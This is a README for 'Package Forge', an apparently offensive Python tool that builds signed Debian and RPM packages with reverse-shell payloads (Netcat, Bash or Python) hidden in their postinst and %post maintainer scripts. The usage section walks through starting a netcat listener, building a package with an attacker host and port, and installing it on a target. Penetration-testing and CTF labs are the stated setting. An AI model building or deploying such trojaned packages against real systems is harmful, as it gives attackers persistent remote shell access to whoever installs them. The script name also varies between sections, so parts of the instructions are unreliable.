Python, Debian, RPM, GPG, Reverse Shell, Security Utility, CTF, Penetration Testing

Security Utility: Package Forge

A security utility for creating malicious signed deb and rpm packages

Background Knowledge

By default, the apt package manager and related front-ends (apt-get, aptitude) in modern Debian systems require a chain of trust back to a trusted GPG key (typically the official Debian archive key). This is primarily achieved by signing the repository metadata (the Release files which contain checksums of all packages), not every individual .deb package fil

the rpm package manager uses a similar system.

In most situations this tool will not be able to be utilized unless we are able to somehow import our public key into the target system and then install the package.

This tool is developed targeting a security misconfiguration - systems which have disabled package signing requirements before installing packages.

This might occur in a development lab environment or perhaps post compromise of a web application that manages packages and installs them insecurely.

Package Forge's Purpose

Package Forge is a security research utility designed to create authentically signed .deb (Debian) and .rpm (RedHat) packages. It automates the generation of GPG keys, the signing process, and the configuration of local verification policies (debsig-verify).

This tool demonstrates how "trusted" packages can be weaponized using maintainer scripts (postinst and %post) to establish persistent access upon installation.

Key Features

  • Dual Format: Generates both Debian and RPM packages simultaneously.
  • Authentic Signing: Automatically signs packages with a locally generated GPG key.
  • Automated Policy Setup: Configures /etc/debsig/policies for seamless verification.
  • Embedded Payload: Injected non-blocking Netcat/Python/Bash reverse shells.
  • Debug Mode: Provides granular logs for troubleshooting XML DTD and GPG keyring issues.

Project Setup

1. Prerequisites

Ensure your Kali Linux or lab machine has the necessary packaging and signing tools installed:

sudo apt update
sudo apt install -y debsigs debsig-verify rpm gnupg binutils

2. Usage

python3 package_forge.py
 
usage: package_forge.py [-h] [-b] [-s] [-u] [-d] [--lhost LHOST] [--lport LPORT] [--payload {nc,bash,python}]
 
Package Forge
 
options:
  -h, --help            show this help message and exit
  -b, --build           Build and sign packages
  -s, --setup-verify    Setup system trust and verify
  -u, --uninstall       Remove trust settings
  -d, --debug           Verbose logs
  --lhost LHOST
  --lport LPORT
  --payload {nc,bash,python}
  1. Set up your Listener: nc -lvnp 4444
  2. Build and Sign: python3 package_gen.py -b -s --lhost 10.10.x.x --lport 4444
  3. Install on Target: sudo dpkg -i dist/secure-tool_1.0.0_amd64.deb

When using the -b flag to build the packages the tool will prompt you to import the trust certificates and make some system configurations on your host system. This is done assuming that you will be testing the payload on your own system first. Those configurations are done to import the key so that we can test that the informally signed payload runs successfully encase we are able to import our public key on a target. It will also reduce the present errors in cases where the target system does allow installation of informally verified packages.

Troubleshooting

1. GPG Signature Hangs

If the script hangs during the "Signing" phase, ensure gpg-agent isn't stuck:

gpgconf --kill gpg-agent

2. "No applicable policy found"

  • Check Case Sensitivity: Ensure the ID in debsig.pol uses lowercase id=.
  • Verify Directory Name: The policy directory must be the Full Fingerprint (e.g., /etc/debsig/policies/2282...).

Alternative Payloads

If nc -e is missing, use the --payload flag to switch:

  • Bash: python3 package_gen.py -b --payload bash
  • Python: python3 package_gen.py -b --payload python